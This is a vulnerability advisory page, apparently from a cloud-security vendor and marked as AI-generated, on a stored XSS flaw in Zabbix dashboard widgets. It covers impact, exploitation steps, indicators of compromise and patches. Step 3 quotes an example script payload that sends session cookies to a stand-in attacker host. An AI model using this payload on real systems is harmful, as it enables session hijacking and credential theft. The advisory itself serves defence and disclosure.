CVE-2026-23928
Zabbix Server vulnerability analysis and mitigation

Overview

CVE-2026-23928 is a stored Cross-Site Scripting (XSS) vulnerability in Zabbix's Item history widget (Zabbix 7.0+) and Plain text widget (Zabbix 6.0) that allows injected JavaScript to execute when HTML display is enabled. An attacker controlling a monitored host can inject malicious JavaScript payloads that are stored and later executed in the browser of any user who opens a dashboard containing these widgets. Affected versions include Zabbix 6.0.0–6.0.44, 7.0.0–7.0.23, and 7.4.0–7.4.7. The vulnerability was published on May 6, 2026, with a CVSS v4.0 base score of 7.3 (High) (Zabbix Bug Tracker, GitHub Advisory).

Technical details

The root cause is improper neutralization of user-controllable input before it is rendered in a web page (CWE-79 — Stored XSS). When the Item history or Plain text widget is configured with HTML display enabled, data values submitted by monitored hosts are rendered as raw HTML/JavaScript in the Zabbix frontend without adequate sanitization. An attacker who controls a monitored host can send crafted metric values containing JavaScript payloads; these are stored in the Zabbix database and executed in the victim's browser when they view the affected dashboard widget. Exploitation requires the attacker to have control over a monitored host (a deployment-specific precondition) and a privileged user to passively view the dashboard (Zabbix Bug Tracker, GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any Zabbix user who opens a dashboard containing the vulnerable widget, potentially including administrators. This can result in session hijacking, credential theft, unauthorized configuration changes, or other actions performed on behalf of the victim user — all with the victim's privilege level. The confidentiality, integrity, and availability of the vulnerable Zabbix system are all rated High impact under CVSS v4.0, though subsequent (downstream) systems are not directly impacted (Zabbix Bug Tracker, GitHub Advisory).

Exploitation steps

  1. Gain control of a monitored host: The attacker must control a host that is actively monitored by the target Zabbix instance (e.g., via a compromised agent or by registering a rogue host if auto-registration is enabled).
  2. Identify a vulnerable widget: Confirm that the target Zabbix dashboard uses the Item history widget (Zabbix 7.0+) or Plain text widget (Zabbix 6.0) with HTML display enabled.
  3. Inject a malicious payload: From the controlled monitored host, submit a crafted item value containing a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) via the Zabbix agent or passive check mechanism.
  4. Wait for victim interaction: The malicious value is stored in the Zabbix database. When a privileged user (e.g., an administrator) opens the dashboard containing the affected widget, the browser renders the HTML and executes the injected JavaScript.
  5. Achieve objective: The executed script can exfiltrate session cookies, perform actions in the Zabbix UI on behalf of the victim, or pivot to further attacks within the organization's monitoring infrastructure (Zabbix Bug Tracker, GitHub Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from a Zabbix frontend server to external or unusual IP addresses, particularly originating from browser sessions of Zabbix users.
  • Logs: Zabbix server or proxy logs showing unusual or encoded item values (e.g., containing <script>, javascript:, or HTML event handlers) submitted by monitored hosts; web server access logs showing requests to external domains initiated from the Zabbix web UI.
  • File System: No direct file system artifacts expected for this XSS vector, but check for unexpected scripts or web shells if post-exploitation activity occurred.
  • Application: Zabbix audit logs showing unexpected administrative actions (user creation, configuration changes, API token generation) performed by privileged accounts that may indicate session hijacking following XSS execution (Zabbix Bug Tracker).

Mitigation and workarounds

Zabbix has released patched versions: 6.0.45, 7.0.24, and 7.4.8, which address this vulnerability (Zabbix Bug Tracker). Organizations unable to upgrade immediately should disable HTML display in the Item history widget (Zabbix 7.0+) or Plain text widget (Zabbix 6.0), or disable these widgets entirely via Administration → General → Modules. Additionally, restricting which hosts can be monitored and ensuring only trusted sources provide monitored data reduces the attack surface.

Community reactions

The vulnerability was reported by Janis Nulle and assigned to the Zabbix Support Team, with the issue resolved on the same day it was created (May 6, 2026) (Zabbix Bug Tracker). Red Hat tracked the issue via Bugzilla (Bug 2466965) with a medium severity rating (Red Hat Bugzilla). The vulnerability received coverage in weekly threat landscape digests but has not generated significant broader community or media discussion, consistent with its moderate severity and limited exploitability preconditions.

Additional resources


SourceThis report was generated using AI

Related Zabbix Server vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-23928HIGH7.3
  • Zabbix Server logoZabbix Server
  • cpe:2.3:a:zabbix:zabbix
NoNoMay 06, 2026
CVE-2026-23926HIGH7.3
  • Zabbix Server logoZabbix Server
  • cpe:2.3:a:zabbix:zabbix
NoNoMay 06, 2026
CVE-2026-23923MEDIUM6.9
  • Zabbix Server logoZabbix Server
  • cpe:2.3:a:zabbix:zabbix
NoNoMar 24, 2026
CVE-2026-23924MEDIUM6.1
  • Zabbix Server logoZabbix Server
  • zabbix
NoNoMar 24, 2026
CVE-2026-23927MEDIUM5.1
  • Zabbix Server logoZabbix Server
  • zabbix
NoNoMay 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management